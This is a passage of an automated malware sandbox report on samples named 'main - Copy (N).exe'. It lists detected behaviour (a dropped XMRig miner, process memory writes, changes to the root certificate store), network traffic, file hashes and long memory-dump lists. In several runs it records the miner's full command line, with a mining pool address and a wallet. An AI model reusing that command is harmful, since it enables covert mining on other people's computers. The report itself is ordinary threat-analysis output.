memory/2736-73-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-74-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-75-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-76-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-77-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-78-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-79-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-80-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-81-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-82-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1773s

Max time network

1786s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:34

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1792s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3912 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 3912 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
BE 2.17.107.98:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 98.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1452-14-0x000001E88D620000-0x000001E88D640000-memory.dmp

memory/1452-15-0x000001E9212A0000-0x000001E9212C0000-memory.dmp

memory/1452-16-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-19-0x000001E9216E0000-0x000001E921700000-memory.dmp

memory/1452-18-0x000001E921920000-0x000001E921940000-memory.dmp

memory/1452-17-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-20-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-21-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-22-0x000001E921920000-0x000001E921940000-memory.dmp

memory/1452-23-0x000001E9216E0000-0x000001E921700000-memory.dmp

memory/1452-24-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-25-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-26-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-27-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-28-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-29-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-30-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-31-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-32-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-33-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-34-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-35-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-36-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-37-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-38-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-39-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-40-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-41-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-42-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-43-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-44-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-45-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-46-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-47-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-48-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-49-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-50-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-51-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-52-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-53-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-54-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-55-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-56-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-57-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-58-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-59-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-60-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-61-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-62-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-63-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-64-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-65-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-66-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-67-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-68-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-69-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-70-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-71-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-72-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-73-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-74-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-75-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-76-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-77-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-78-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-79-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-80-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-81-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-82-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:40

Platform

win10v2004-20240226-en

Max time kernel

1800s

Max time network

1808s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 4624 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3952 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 234.17.178.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
DE 142.250.186.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.242.123.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1704-16-0x000001973AB30000-0x000001973AB50000-memory.dmp

memory/1704-17-0x000001973C340000-0x000001973C360000-memory.dmp

memory/1704-18-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-21-0x000001973C360000-0x000001973C380000-memory.dmp

memory/1704-20-0x000001973C380000-0x000001973C3A0000-memory.dmp

memory/1704-19-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-22-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-23-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-24-0x000001973C380000-0x000001973C3A0000-memory.dmp

memory/1704-25-0x000001973C360000-0x000001973C380000-memory.dmp

memory/1704-26-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-27-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-28-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-29-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-30-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-31-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-32-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-33-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-34-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-35-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-36-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-37-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-38-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-39-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-40-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-41-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-42-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-43-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-44-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-45-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-46-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-47-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-48-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-49-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-50-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-51-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-52-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-53-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-54-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-55-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-56-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-57-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-58-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-59-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-60-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-61-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-62-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-63-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-64-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-65-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-66-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp
